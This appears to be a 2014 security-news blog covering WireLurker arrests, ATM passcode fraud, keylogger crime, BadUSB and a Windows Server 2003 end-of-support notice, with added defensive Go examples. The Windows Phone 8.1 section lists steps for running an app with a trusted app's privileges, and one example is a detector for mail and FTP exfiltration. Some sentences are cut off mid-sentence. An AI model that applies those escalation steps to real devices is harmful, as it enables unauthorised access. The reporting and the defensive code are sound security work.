“Homeland Security is leading its development, in coordination with private sector partners, as part of a long-term effort to strengthen existing cyber defense capabilities through better interoperability and shared situational awareness, real-time response, and the protection of privacy, civil rights and civil liberties,” Lee added.
The DHS official also remarked that EASE is still an embryonic idea, but it is also a concrete need for the country, and for this reason the US Government will continue to support it and any other program that could improve its cyber capabilities.

Suspected Wirelurker iOS Malware Creators Arrested in China

It’s been almost two weeks since the existence of the WireLurker malware was first revealed, and Chinese authorities have arrested three suspects who are allegedly the authors of the Mac and iOS malware that may have infected as many as hundreds of thousands of Apple users.

The Beijing Bureau of Public Security has announced the arrest of three suspects charged with distributing the WireLurker malware through a popular Chinese third-party online app store. The authorities also say the website responsible for spreading the malware has been shut down.

The "WireLurker" malware was originally discovered earlier this month by security firm Palo Alto Networks, targeting Apple users in China. It appeared to be the first malicious program able to penetrate the iPhone's strict software controls; the main concern about this threat was its ability to attack non-jailbroken iOS devices.

Once a device was infected, the malware could download malicious, unapproved apps designed to steal information from third-party app stores and, if it detected an iOS device connected through USB, install the malicious apps on that device as well.
"This malware is under active development and its creator’s ultimate goal is not yet clear," the researchers wrote in a report [PDF]. "The ultimate goal of the WireLurker attacks is not completely clear. The functionality and infrastructure allows the attacker to collect significant amounts of information from a large number of Chinese iOS and Mac OS systems, but none of the information points to a specific motive. We believe WireLurker has not yet revealed its full functionality."
Unlike most iPhone malware, WireLurker is able to install even on non-jailbroken iOS devices because its authors used enterprise certificates to sign the apps. Apple has since revoked the cryptographic certificates used to sign WireLurker and blocked all the apps signed with them. Palo Alto estimated that hundreds of thousands of users installed the malicious apps.

China appears to have taken the threat very seriously and within two weeks arrested three individuals who are believed to be the creators of the malicious software.

There are not many details available about the arrest, as the Bureau has simply posted a short notification on Sina Weibo, a Chinese microblogging service.

According to the Chinese authorities, the three suspects, identified as "Chen," "Lee" and "Wang," are suspected of manufacturing and distributing the malicious program "for illegal profit." The authorities were helped in the investigation by researchers from the Chinese AV company Qihoo 360.

Possible Windows Phone hack.

Operators of the XDA-developers forum explained how it is possible to hack Windows Phone 8.1 so that any app package runs in any Program directory.

XDA-developers have discovered a new vulnerability in Microsoft’s latest mobile OS, Windows Phone 8.1, that could easily be exploited by attackers to compromise a Nokia Lumia phone running it.
The XDA Developers member known as DJAmol discovered a vulnerability in Windows Phone 8.1 that allows an attacker to run arbitrary applications with other users’ privileges and to edit the registry.
The XDA developers forum has already reported the security issue to Microsoft; as the forum operators explained, the vulnerability could give an attacker higher privileges if exploited through a first-party application rather than a third-party app.
“There is a possibility to run any app package in any Program directory. Can be possible run homebrew app in second party and first party directory. Important thing is that app runs with the reserved capabilities of the targeted directory. Such as “SECOND PARTY APPLICATION” capabilities and “FIRST PARTY APPLICATION” capabilities.” XDA-developers state in a blog post.
The hackers explained that simply by replacing the contents of a trusted OEM app that has been moved to the SD card, the attacker’s app inherits the privileges of the legitimate one. Once the malicious app is transferred, the attacker has to delete the existing directory and create a new one with the same name as the original app.
In this way a third-party registry editor app gains full access to the Info and Settings of the app itself. XDA-developers provided a detailed description of the hack on Windows Phone 8.1 in their post; the basic steps are below.
  • Develop your own application package and deploy it on the target device.
  • Install an application from the Windows Phone app Store, for example “Glance Background Beta”.
  • Delete all folders under the targeted directory of the installed app, in the example proposed by the hackers Glance Background [Install, NI, TempInstall, TempNI, XBF etc.].
  • Copy the contents of your own deployed package into the targeted directory, replacing the “Program Files” of the installed app with your package files.
  • Launch the app, which will run in the OEM (Glance Background Beta) directory with the privileges of the targeted app.
The hack on Windows Phone 8.1 is very easy to implement, but it has not yet escalated to a full interop unlock, as the applications that are allowed to be moved to the SD card have limited access.
“Does this mean that lumia phones can be-are interop unlocked?” asked the user matgras
“May be or may not be. I’ve not researched it yet. Does this mean that lumia phones can be-are interop unlocked?
Those methods also work on any OEM Device, not specific for the Lumia.”
Stay tuned for more information on the case, which is expected from Microsoft.

Sunday, 16 November 2014

More ATMs hacked



Two little-known Tennessee men used a factory default passcode to dupe ATMs into dispensing more cash in an 18-month hacking spree cut short by the Secret Service. The money-minting operation proves how low-tech street criminals pose a threat to poorly configured and serviced ATMs all over the world.

A recent shocker in the tech world revealed that over 80% of ATMs use outdated Windows XP, which ran out of commercial support years ago. Just to show how vulnerable ATMs are to low-tech street crime, two little-known Tennessee men, Khaled Abdel Fattah and his accomplice Chris Folad, went on an ATM hacking spree in Nashville, netting over $400,000 in cash in their 18-month expedition.

Note that this was not a typical hack employing sophisticated banking malware to steal money. Instead the two used a sequence of key combinations on the keypad to put the ATM into “operator mode” and reconfigure the cash dispensers. Once in operator mode, the ATM was configured to dispense $20 for every $1 requested; for example, a $20 withdrawal would dispense $400 in cash.

Fattah and his accomplice now face an array of computer fraud charges following their short-lived money-minting operation in Nashville. “Fattah and an associate named Chris Folad are facing 30 counts of computer fraud and conspiracy, after a Secret Service investigation uncovered evidence that the men had essentially robbed the cash machines using nothing more than the keypad,” reported Wired in a blog post.

Technically, an ATM can be put into operator mode using a passcode initially provided by the manufacturer. Once in operator mode, the operator is able to configure how the ATM dispenses cash, including the denomination loaded in the cartridges. In this case, Fattah was a former employee of an ATM firm, and all he needed was to key in the factory-set passcode.

The fraud was first discovered by a business owner who noticed an abnormality in the cash flows of one of the ATM kiosks visited by the duo. He informed the Secret Service, who analyzed surveillance footage, tracked down and arrested Fattah and his accomplice.

“They were little kiosk ATMs, like you would find in a business or a convenience store,” says Greg Mays, assistant special agent in charge of the US Secret Service’s Nashville office. “I believe the businesses noticed there was a problem when the machine was running out of money.”

Fortunately, Fattah and his friend conducted their operation in full view of security cameras, and they also used their real debit cards, making it easy for the Secret Service to trail and net them.

Exploits of this nature are common in the tech world, but the majority of incidents go unreported by banks and other financial institutions, which fear the possibility of a bank run. The problem lies with the factory-preset passcode given by the ATM vendor, usually printed in the ATM manual. A majority of small business owners fail to reset the default code on a new machine or when an employee leaves. In reality, the code should be changed frequently and kept within a small circle of employees.

In a similar ATM hack in 2005, fraudsters discovered that the factory-set passcodes of Tranax and Triton ATMs were freely available online. They went viral hacking every available machine, prompting Triton and Tranax to reprogram their machines and force operators to change the passcode on first use.

In another incident, a 14-year-old boy in Winnipeg followed an instruction manual to crack the operator’s passcode and access a Bank of Montreal ATM in June this year. The boy notified the bank to change its
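The mitigation Triton and Tranax are credited with above (the factory passcode works only to set a new one) and the advice that codes be rotated and kept close, written out as an added Go example. This is illustrative code, not any ATM vendor’s implementation; the code length, the three-attempt lockout and the 90-day rotation period are assumptions chosen for the example.

```go
package main

import (
	"crypto/sha256"
	"crypto/subtle"
	"errors"
	"fmt"
	"time"
)

// OperatorAuth models the operator-mode passcode of a kiosk ATM (constructed example,
// not a vendor's code): the factory code is accepted exactly once and only to set a
// replacement, the replacement may not equal the factory code, repeated failures lock
// the keypad, and codes expire so that they get rotated.
type OperatorAuth struct {
	hash        [32]byte // sha256 of the current code; the clear code is never stored
	defaultHash [32]byte // sha256 of the factory code, kept only to refuse its reuse
	mustChange  bool     // true until the factory code has been replaced
	failures    int
	changedAt   time.Time
}

const (
	maxFailures = 3                    // assumption: lock after three wrong codes
	maxAge      = 90 * 24 * time.Hour  // assumption: rotate at least every 90 days
	minLen      = 6
)

var (
	ErrLocked     = errors.New("operator mode locked after repeated failures")
	ErrBadCode    = errors.New("wrong passcode")
	ErrMustChange = errors.New("factory passcode must be replaced before operator mode is granted")
	ErrWeakCode   = errors.New("new passcode too short, or equal to the factory or current code")
	ErrExpired    = errors.New("passcode older than policy allows; change it first")
)

func hashCode(code string) [32]byte { return sha256.Sum256([]byte(code)) }

// NewOperatorAuth provisions a machine with the vendor's factory code, flagged for change.
func NewOperatorAuth(factoryCode string) *OperatorAuth {
	h := hashCode(factoryCode)
	return &OperatorAuth{hash: h, defaultHash: h, mustChange: true}
}

// check compares in constant time so a keypad timing difference leaks nothing.
func (a *OperatorAuth) check(code string, h [32]byte) bool {
	got := hashCode(code)
	return subtle.ConstantTimeCompare(got[:], h[:]) == 1
}

// EnterOperatorMode grants access only with a correct, non-default, unexpired code.
func (a *OperatorAuth) EnterOperatorMode(code string, now time.Time) error {
	if a.failures >= maxFailures {
		return ErrLocked
	}
	if !a.check(code, a.hash) {
		a.failures++
		return ErrBadCode
	}
	a.failures = 0
	if a.mustChange {
		return ErrMustChange // the factory code never opens operator mode by itself
	}
	if now.Sub(a.changedAt) > maxAge {
		return ErrExpired
	}
	return nil
}

// ChangePasscode is the only operation the factory code is allowed to perform.
func (a *OperatorAuth) ChangePasscode(current, next string, now time.Time) error {
	if a.failures >= maxFailures {
		return ErrLocked
	}
	if !a.check(current, a.hash) {
		a.failures++
		return ErrBadCode
	}
	a.failures = 0
	if len(next) < minLen || a.check(next, a.defaultHash) || a.check(next, a.hash) {
		return ErrWeakCode
	}
	a.hash, a.mustChange, a.changedAt = hashCode(next), false, now
	return nil
}

func main() {
	now := time.Now()
	atm := NewOperatorAuth("123456") // constructed factory code, not a real vendor default
	fmt.Println("factory code alone:", atm.EnterOperatorMode("123456", now))
	fmt.Println("set new code:", atm.ChangePasscode("123456", "809213", now))
	fmt.Println("new code:", atm.EnterOperatorMode("809213", now))
	fmt.Println("after 100 days:", atm.EnterOperatorMode("809213", now.Add(100*24*time.Hour)))
}
```

The design point is that the factory code is a bootstrap secret, not a credential: it can only be exchanged for a new one, and a passcode that has never been changed never opens the cash-configuration menu.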

Saturday, 15 November 2014

More ATMs hacked

A cybercrime expert explains that anyone with technical knowledge, a piece of malware and the help of an insider could easily hack an ATM.

A RM100 chip, specific technical knowledge and free malware obtained over the Internet are all that is necessary to hack Automated Teller Machines (ATMs); this is the opinion of a cybercrime expert who gave an exclusive interview to FMT (freemalaysiatoday.com).

The cybercrime expert was invited to comment on a recent hacking case involving 17 ATMs, in which a Latin American gang of cyber criminals was able to hack and steal millions of dollars from automated teller machines in Malaysia.

The hackers stole more than $1.2 million from ATMs at no fewer than 17 bank branches belonging to United Overseas Bank, Affin Bank, Al Rajhi Bank and Bank of Islam, which were reportedly hacked by the Latin American gang.

Closed-circuit television (CCTV) footage from the banks showed that 2-3 Latin American men entered and withdrew money from the targeted ATMs.

“What you need is a mastermind, a RM100 computer chip and possibly a bank ‘insider’ to execute the attacks.” he said.

The 17 ATM hacks must be a warning for the banking industry, which according to the expert is losing ground in the fight against cybercrime.

“Banks should look into their security seriously, and not just for the sake of compliance.” “This mentality has to be changed to build security in the DNA of the bank.”


Little information is needed by the attacker: knowledge of the targeted system can be enough to compromise a banking ATM, and all this information is typically provided by insiders.

“He (the hacker) will know where the locks and connections are, the model of the machine, the level of security and the version of the operating system.” explained the expert.

The expert also pointed out the roles of the men captured by the surveillance cameras at the bank:

“The guys caught on the CCTV are not the actual criminals.” “It’s like the ‘monkey see, monkey do’ situation. They can be shown what is supposed to be done without the need for any technical knowledge. They probably do not even know what they are doing.”

According to the expert, hacking an ATM can be very easy using malware that is easy to find in the underground; a security expert would have no problem wreaking havoc on the actual banking system.

“It is a simple attack as there are many free malware available online. And it is definitely something that the bank has to seriously think about.”

Based on his experience in the sector, the expert highlighted the wrong approach of the banking industry to the protection of ATMs: in many cases these machines run outdated OSs, lack patch management or are poorly configured.

The expert is very critical of financial institutions; he explicitly refers to the results of a series of penetration tests conducted against banking systems that succeeded in breaching the

“The bank I worked for was not happy that we breached the system after doing a hacking” he said.  “It’s either they wanted to ensure that we couldn’t find anything, or, they will hire incompetent people who will not find anything.”

The results of the penetration testing sessions demonstrate the presence of several weaknesses in the banking systems; in many cases the ATMs were running outdated operating systems like Windows XP.

“Banks have been taking things for granted because nothing like this has ever happened before.” the expert added. “They depended heavily on the CCTV and in some locations, they do not even have security guards.”

The experts involved in the test also discovered many other serious flaws in the ATMs; the lack of encryption could expose sensitive data to tampering, facilitating a malware-based attack on these machines.

“It is also because of the lack of encryption technology such as the Public Key Infrastructure (PKI).” “If the PKI was implemented, it wouldn’t have happened,” he added.

Pierluigi Paganini

(Security Affairs – ATM hacking, RM100 computer chip)

Privacy seminar will shake up São Paulo

http://www.emersonwendt.com.br/2014/10/evento-v-seminario-de-protecao.html?m=1

Thursday, 13 November 2014

Cyber security workshop is in the news


Information security will be the topic of a workshop in Rio de Janeiro
TUE, 11 NOVEMBER 2014 10:30 WRITTEN BY AGÊNCIA GESTÃO CT&I

The advance of threats in cyberspace and the ways to protect oneself in the virtual environment will be the topics of the workshop “Segurança Cibernética para as novas Infraestruturas Inteligentes” (Cyber Security for the New Smart Infrastructures), to be held this Thursday (13) at the laboratory campus of the Instituto Nacional de Metrologia, Qualidade e Tecnologia (Inmetro), in the municipality of Duque de Caxias (RJ). The program, which includes panels and technical sessions, aims to encourage debate on the importance of developing security tools.
Organized by Inmetro and its counterpart in the United States, the National Institute of Standards and Technology (NIST), the meeting will address subjects such as the control and monitoring over networks of services like water and electricity. The two bodies have already carried out joint research in strategic areas such as calibration and biofuels, among others.

For more details on registration, as well as the full program, visit the workshop website at this link.

(Agência Gestão CT&I,

Cybercrime using keyloggers

Trend Micro issued a research paper on the operations behind the Predator Pain and Limitless keyloggers, both of which are easily obtainable from the underground.

Cybercriminals ordinarily use malicious code to steal money from victims; the number of malware families available in the criminal ecosystem is continuously growing, and their sophistication and cost vary widely. Among banking malware, Zeus and SpyEye are probably the most popular, but they represent only the tip of the iceberg: in the underground it is possible to acquire low-priced malware that can still ensure fraudsters substantial gains.
Security experts are aware that all this malicious code, in the “right” hands, can bring in an astounding amount of money and create huge losses for the community.
Security experts at Trend Micro have published an interesting paper on the operations behind Predator Pain and Limitless, two low-priced ($40 or less), off-the-shelf keyloggers/RATs that are easy to acquire on underground forums. The researchers analyzed both Predator Pain and Limitless for only a few months, discovering a surprising reality.
(Figure: Predator Pain and Limitless screenshots)
Let’s start from the economic perspective: the cost of these RATs is $40 or less, but the malware implements capabilities similar to those of many other data stealers.
“Predator Pain and Limitless have the capability to steal a lot of information and exfiltrate them back to the cybercriminals. These are off-the-shelf tools and are easily obtainable for US$40 or less in underground forums or websites run by their creators.” “Attackers, after obtaining access to infected computers and the credentials stored in them, sit on a gold mine of information that they can use for various criminal and fraudulent activities,” the researchers explain in a whitepaper.
Data provided by the Commercial Crime Bureau of the Hong Kong Police Force reveals that cybercriminals using this malware against small and medium-sized businesses in Hong Kong earned more than $75 million in the first half of 2014. These figures are alarming if we compare the losses to the economic impact of the Zeus botnet, as explained in the paper:
“Consider: this means that cybercriminals in a single city, within six-months, equaled all the losses from Zbot up to the present,” Trend Micro senior threat researcher Ryan Flores pointed out. “Unlike Zeus, Predator Pain and Limitless are relatively simple keyloggers. They indiscriminately steal web credentials and mail client credentials, as well as capturing keystrokes and screen captures. The output is human readable, which is good if you are managing a few infected machines only, but the design doesn’t scale well when there are a lot of infected machines and logs involved,” he explained.
(Figure: Predator Pain and Limitless graph)
“In fact, in Hong Kong alone, the estimated loss resulting from corporate email fraud has increased 491% from 2012 to 2013 and 180% from 2013 to 2014. As of June 2014, the total reported loss amounted to HK$565.5 million (approximately US$73 million).”
(Figure: Predator Pain and Limitless comparison)
The use of off-the-shelf keyloggers/RATs like Predator Pain and Limitless doesn’t hold back the illicit activities of criminal crews; in many cases, crooks prefer to invest more time and effort rather than rely on automated malware that is in any case more expensive.

“The tools these fraudsters use are not advanced. Combined, clever targeting, patience, cunning and simple keyloggers have netted these cybercriminals large sums of money,” Flores said. “These highlight that cybercrime activities are dependent not only on the sophistication of the tools used, but on how well organized the entire scheme is. A sophisticated, well-designed scam can net its operators significant sums of money, as seen here.”

Monitoring several Predator Pain and Limitless attacks allowed the experts to track the use of these tools; in particular, the findings revealed that a significant portion of operators were involved in the following:

  • 419 or Nigerian scams through easy-to-deploy, high-volume attacks
  • Scammed corporate emails that convince recipients to deposit payment into specially crafted accounts
419 scams are considered among the more lucrative large-scale activities that benefit from the malware, hitting SMBs almost exclusively. SMBs are more exposed to external attacks due to the lack of an efficient security posture and of dedicated IT security staff.

“SMBs may not be involved in multimillion-dollar deals, but they do conduct transactions worth tens to hundreds of thousands of dollars,” the researchers noted. “As the world relies more and more on Web services (e.g., webmail), all it will take to ruin a business is a single compromised online account.”

The common attack scenario based on this malicious code starts by sending classic phishing emails to publicly listed email addresses. The attackers attach the keylogger to the email; once the victim installs it, the malware silently steals user data, including system screenshots, keystrokes and browser-cached account credentials, and sends the information back to the command and control servers via email, FTP, or a Web panel (PHP).
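The exfiltration channels named above (mail and FTP back to the operator’s server) leave a recognisable trace at the network edge: a workstation that is not the corporate mail relay opening SMTP or FTP sessions straight to the Internet. The following is an added Go example of that detection logic, not code from Trend Micro or from the report. The firewall log format, the 10.0.0.0/8 internal range, the relay address 10.0.0.5 and the external addresses are all constructed for the example; the HTTP/PHP panel channel is left out because it needs proxy logs with request paths rather than firewall connection records.

```go
package main

import (
	"fmt"
	"net"
	"strconv"
	"strings"
)

// Constructed firewall log lines (not real traffic). Workstations sit in 10.0.1.0/24,
// 10.0.0.5 is the sanctioned mail relay, and 203.0.113.10 / 198.51.100.7 stand in for
// attacker-controlled mail and FTP drop points.
const sampleLog = `2014-11-13T10:01:02Z action=allow src=10.0.1.25 dst=10.0.0.5 dport=25
2014-11-13T10:01:09Z action=allow src=10.0.1.25 dst=203.0.113.10 dport=587
2014-11-13T10:02:41Z action=allow src=10.0.1.25 dst=203.0.113.10 dport=587
2014-11-13T10:03:15Z action=allow src=10.0.1.40 dst=198.51.100.7 dport=21
2014-11-13T10:04:00Z action=allow src=10.0.1.40 dst=198.51.100.9 dport=443
2014-11-13T10:05:30Z action=allow src=10.0.0.5 dst=203.0.113.10 dport=25`

// Alert is one suspicious outbound connection.
type Alert struct {
	Src    string
	Dst    string
	Port   int
	Reason string
}

// exfilPorts are the channels the Trend Micro paper lists for these keyloggers:
// mail (SMTP, SMTPS, submission) and FTP.
var exfilPorts = map[int]string{25: "smtp", 465: "smtps", 587: "submission", 21: "ftp"}

// Policy describes what legitimate outbound mail/FTP looks like on this network.
type Policy struct {
	Internal *net.IPNet      // address space of workstations and servers
	Relays   map[string]bool // hosts that are allowed to speak SMTP/FTP to the Internet
}

// parseKV turns "k=v k=v" fields into a map; the leading timestamp has no "=" and is skipped.
func parseKV(line string) map[string]string {
	kv := map[string]string{}
	for _, f := range strings.Fields(line) {
		if i := strings.IndexByte(f, '='); i > 0 {
			kv[f[:i]] = f[i+1:]
		}
	}
	return kv
}

// DetectExfil flags internal hosts that are not mail relays opening mail or FTP
// sessions directly to external addresses, the pattern a keylogger phoning home leaves.
func DetectExfil(logText string, p Policy) []Alert {
	var alerts []Alert
	for _, line := range strings.Split(strings.TrimSpace(logText), "\n") {
		kv := parseKV(line)
		src, dst := net.ParseIP(kv["src"]), net.ParseIP(kv["dst"])
		port, err := strconv.Atoi(kv["dport"])
		if src == nil || dst == nil || err != nil {
			continue // malformed line: skip rather than crash the detector
		}
		if !p.Internal.Contains(src) || p.Internal.Contains(dst) || p.Relays[src.String()] {
			continue // external source, internal destination, or a sanctioned relay
		}
		if svc, ok := exfilPorts[port]; ok {
			alerts = append(alerts, Alert{src.String(), dst.String(), port, "direct outbound " + svc + " bypassing the mail relay"})
		}
	}
	return alerts
}

// DefaultPolicy encodes the constructed network described in the comments above.
func DefaultPolicy() Policy {
	_, internal, _ := net.ParseCIDR("10.0.0.0/8")
	return Policy{Internal: internal, Relays: map[string]bool{"10.0.0.5": true}}
}

func main() {
	for _, a := range DetectExfil(sampleLog, DefaultPolicy()) {
		fmt.Printf("ALERT %s -> %s:%d (%s)\n", a.Src, a.Dst, a.Port, a.Reason)
	}
}
```

On the sample above the rule fires three times (two submission sessions from 10.0.1.25 and one FTP session from 10.0.1.40) and stays quiet for the relay’s own traffic and for ordinary HTTPS. The same egress policy, enforced rather than merely alerted on, is what takes the email and FTP channels away from these tools entirely.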

“Attackers, after obtaining access to infected computers and the credentials stored in them, sit on a gold mine of information that they can use for various criminal and fraudulent activities. Successfully stealing online banking credentials can lead to financial theft. Some of the stolen information provide attackers more leverage for subsequent attacks. They can, for instance, get their hands on actual emails and use these to “hijack” ongoing transactions between their chosen victims and their clients” states the paper, referring to the post-infection activities.

The report highlights that stolen data could be used later for further attacks against the victims and could be sold in the underground to other criminal organizations; personal data and sensitive information are a precious commodity there.

The scariest aspect of the researchers’ analysis of the use of Predator Pain and Limitless is that criminal gangs are targeting SMBs (small and medium-sized businesses), considered vulnerable targets by gangs that aim to realize rapid gains by exploiting the lack of awareness of general IT security best practices.

The “Predator Pain and Limitless: When Cybercrime Turns into Cyberspying” report is another excellent analysis by the researchers at Trend Micro; don’t miss it.

Pierluigi Paganini

(Security Affairs –  Predator Pain and Limitless keyloggers, keyloggers/RAT)


INMETRO and NIST hold a workshop on cyber security.

Concern about the Internet of Things is the main focus of the joint workshop between INMETRO and NIST.
With the growing spread of devices connected to the Internet, it is essential to study the impacts on the security of information, people and businesses.

Pen drive, are you safe?

Researcher Karsten Nohl and his team presented an update of their BadUSB study: it is impossible to distinguish patchable devices from unpatchable ones.

In early August 2014 security expert Karsten Nohl and his team discovered that an attacker could exploit a new class of attacks based on a USB device to compromise a targeted machine. The attack could be used to compromise personal computers and is able to evade all current security protections by loading malicious software into the low-cost controller chips that manage the functions of USB devices.

“Nohl and Lell’s BadUSB demonstrations during Black Hat illustrated how their code could overwrite USB firmware and turn a USB device into anything. A flash drive plugged into a PC, could for example, emulate a keyboard and issue commands that steal data from the machine, spoof a computer’s network interface and redirect traffic by altering DNS settings, or could load malware from a hidden partition on the drive.”

The researchers pointed to a series of flaws in the software that runs these tiny electronic components; the components are usually designed without protections against tampering with their code. Attackers can uncover such flaws and exploit them, creating serious problems for the targeted architecture.


“You cannot tell where the virus came from. It is almost like a magic trick,” said Nohl.

As reported in a blog post published by Wired, the unpatchable security flaw in USB devices affects only about half of USB devices, but it is nearly impossible to distinguish secure USB units from insecure ones “without ripping open every last thumb drive”.

Last week Nohl and his fellow researchers Jakob Lell and Sascha Krissler presented an update to the BadUSB research at the PacSec security conference in Tokyo. The experts analyzed the USB controller chips sold by the eight biggest vendors (Phison, Alcor, Renesas, ASmedia, Genesys Logic, FTDI, Cypress and Microchip), discovering that half of them were vulnerable to the attack, but they also revealed that it is impossible for the end user to predict which chip a device uses.

“It’s not like you plug [a thumbdrive] into your computer and it tells you this is a Cypress chip, and this one is a Phison chip,” says Nohl, naming two of the top USB chip manufacturers. “You really can’t check other than by opening the device and doing the analysis yourself…The scarier story is that we can’t give you a list of safe devices.”

The experts analyzed versions of each chip both by looking up its published specs and by plugging a device that used it into a USB port and attempting to overwrite the firmware in the chip.

“They found an unpredictable patchwork of results. All of the USB storage controllers from Taiwanese firm Phison that Nohl tested, for instance, were vulnerable to reprogramming. Chips from ASmedia weren’t, Nohl’s tests found. Controller chips from fellow Taiwanese company Genesys that used the USB 2 standard were immune, but ones that used the newer USB 3 standard were susceptible. In other categories of device like USB hubs, keyboards, webcams and mice, the results produced an even messier Excel spreadsheet of “vulnerable,” “secure,” and “inconclusive.”” reports Wired.

Unfortunately, device makers don’t provide information on the manufacturer of the chips they integrate; in some cases they use chips from different vendors even in the same product, a policy that lets them choose the cheapest supplier for each production lot.

The only way to prevent exploitation of BadUSB would be to require device makers to label the chips they use in their products.

“You’d never get away with this in a laptop. People would go crazy if they bought a computer and it wasn’t the chip they saw in the review they read,” explains Nohl. “It’s just these USB devices that come as black boxes.”

It’s clear that what Nohl suggests is quite impossible to realize, so the researcher decided not to release the proof-of-concept code for his BadUSB attack when he demonstrated it at Black Hat.

The company Imation has already implemented a solution to protect its users against BadUSB attacks: its IronKey product requires that any update to its chip firmware be digitally signed with an unforgeable cryptographic signature. The process is designed to prevent malicious reprogramming of the USB firmware. According to Nohl, other USB makers could adopt the same strategy to secure their users.
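The signed-firmware requirement described above, written out as an added Go example of how a controller can refuse unsigned or altered images. This is illustrative code, not Imation’s or IronKey’s implementation: the image layout (a “FWUP” magic string, a big-endian version number, the payload and a trailing Ed25519 signature) and the rule that versions may only move forward are assumptions chosen for the example. The device holds only the vendor’s public key, so an attacker who can reach the controller still cannot produce an image it will accept.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/binary"
	"errors"
	"fmt"
)

// Assumed update-image layout for this example (not any vendor's real format):
//   "FWUP" | uint32 version (big-endian) | payload | 64-byte Ed25519 signature
// The signature covers everything before it, so version and payload are both bound.
const magic = "FWUP"

var (
	ErrBadFormat = errors.New("update image too short or wrong magic")
	ErrBadSig    = errors.New("signature verification failed; image rejected")
	ErrRollback  = errors.New("image version is not newer than installed firmware")
)

// BuildUpdate is the vendor-side step: the private key never leaves the vendor.
func BuildUpdate(priv ed25519.PrivateKey, version uint32, payload []byte) []byte {
	body := make([]byte, 0, len(magic)+4+len(payload))
	body = append(body, magic...)
	var vb [4]byte
	binary.BigEndian.PutUint32(vb[:], version)
	body = append(body, vb[:]...)
	body = append(body, payload...)
	sig := ed25519.Sign(priv, body)
	return append(body, sig...)
}

// VerifyUpdate is the device-side step: with only the public key and the installed
// version, it returns the payload to flash, or an error that leaves the old firmware in place.
func VerifyUpdate(pub ed25519.PublicKey, installed uint32, image []byte) ([]byte, error) {
	if len(image) < len(magic)+4+ed25519.SignatureSize || string(image[:len(magic)]) != magic {
		return nil, ErrBadFormat
	}
	body := image[:len(image)-ed25519.SignatureSize]
	sig := image[len(image)-ed25519.SignatureSize:]
	if !ed25519.Verify(pub, body, sig) {
		return nil, ErrBadSig // any flipped byte in version or payload lands here
	}
	version := binary.BigEndian.Uint32(body[len(magic) : len(magic)+4])
	if version <= installed {
		return nil, ErrRollback // a genuine but older image must not be replayed
	}
	return body[len(magic)+4:], nil
}

func main() {
	pub, priv, err := ed25519.GenerateKey(rand.Reader) // vendor key pair (constructed)
	if err != nil {
		panic(err)
	}
	img := BuildUpdate(priv, 2, []byte("constructed firmware payload v2"))
	if _, err := VerifyUpdate(pub, 1, img); err != nil {
		fmt.Println("unexpected:", err)
	} else {
		fmt.Println("genuine update accepted")
	}
	tampered := append([]byte(nil), img...)
	tampered[12] ^= 0x01 // one flipped payload bit, as a reprogramming attempt would leave
	_, err = VerifyUpdate(pub, 1, tampered)
	fmt.Println("tampered update:", err)
	_, err = VerifyUpdate(pub, 2, img)
	fmt.Println("replayed old version:", err)
}
```

Two details matter beyond the signature itself: the version is inside the signed body, so rollback to a genuine older image with a known flaw is refused, and verification happens before anything is written, so a rejected image leaves the installed firmware untouched.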

Nohl highlighted that the total lack of transparency in the USB device industry exposes everyone who uses a USB device to the risk of attack; every device is potentially exploitable by bad actors.

“Some people have accepted that USB is insecure. Others remember BadUSB only as the Phison bug. That second group needs to wake up to the same level of awareness of the first group,” Nohl says. “For practical purposes, it affects potentially everything.”

Pierluigi Paganini

How does a connected world affect privacy?


The biggest challenges around connected devices
Posted on 13 November 2014.
Few European IT departments or workplaces are ready for the invasion of wearable technology and other connected devices.

According to a 110-country survey of ISACA members who are business and IT professionals, 43% of respondents in Europe, the Middle East and Africa (EMEA) say their organization has plans in place to leverage the Internet of Things or expects to create plans in the next 12 months.

However, the majority is not ready for wearable technology in the workplace. More than half (57%) say their BYOD policy does not address wearables and a further 24% do not even have a BYOD policy in place. This is a concern, as approximately 8 in 10 respondents (81%) say BYOW (bring your own wearables) is as risky as—or riskier than—BYOD.

Overall, half of ISACA members across EMEA believe the benefit of the Internet of Things outweighs the risk for individuals (50%), while nearly a third believe the risk outweighs the benefit for enterprises (31%). Yet despite the risks, nearly a third (30%) says the Internet of Things has given their business greater access to information and a quarter (25%) say it has improved services in their organization.

Approximately four in 10 hope to benefit from improved services (40%), increased customer satisfaction (39%), and greater efficiency (38%) as a result of connected devices.

Despite the benefits of connected devices, more than half (51%) of respondents believe the biggest challenge regarding the Internet of Things is increased security threats, while a quarter (26%) are concerned about data privacy issues. Two-thirds (68%) admit they are very concerned about the decreasing level of personal privacy.

More than a quarter of respondents say the general public’s biggest concerns about connected devices should be that they don’t know how the information collected on the devices will be used (28%) or they don’t know who has access to the information collected (26%).

“The Internet of Things is here to stay, and following the holidays, we are likely to see a surge in wearable devices in the workplace,” said Ramsés Gallego, international vice president of ISACA. “These devices can deliver great value, but they can also bring great risk. ISACA’s research found that more than a third (35%) of EMEA ISACA members believe Big Data has the potential to add significant value, yet one-fifth (21%) admit their organization lacks the analytics capabilities or skills to deal with it.”

Tuesday, 11 November 2014

End of life 2003 server


NCCIC / US-CERT
National Cyber Awareness System:

TA14-310A: Microsoft Ending Support for Windows Server 2003 Operating System
11/10/2014 07:19 AM EST

Original release date: November 10, 2014
Systems Affected

Microsoft Windows Server 2003 operating system

Overview

Microsoft is ending support for the Windows Server 2003 operating system on July 14, 2015.[1] After this date, this product will no longer receive:

Security patches that help protect PCs from harmful viruses, spyware, and other malicious software
Assisted technical support from Microsoft
Software and content updates
Description

All software products have a lifecycle. End of support refers to the date when Microsoft will no longer provide automatic fixes, updates, or online technical assistance.[2] As of July 2014, there were 12 million physical servers worldwide still running Windows Server 2003.[3]

Impact

Computer systems running unsupported software are exposed to elevated cybersecurity risk, such as malicious attacks or electronic data loss.

Users may also encounter problems with software and hardware compatibility since new software applications and hardware devices may not be built for Windows Server 2003.

Organizations that are governed by regulatory obligations may find they are no longer able to satisfy compliance requirements while running Windows Server 2003.

Solution

Computers running the Windows Server 2003 operating system will continue to work after support ends. However, using unsupported software may increase the risk of viruses and other security threats. Negative consequences could include loss of confidentiality, integrity, and/or availability of data, system resources, and business assets.

The Microsoft "Microsoft Support Lifecycle Policy FAQ" page offers additional details.[2]

Users have the option to upgrade to a currently supported operating system or other cloud-based services. There are software vendors and service providers in the marketplace who offer assistance in migrating from Windows Server 2003 to a currently supported operating system or SaaS (software as a service) / IaaS (infrastructure as a service) products and services.[4,5] US-CERT does not endorse or support any particular product or vendor.
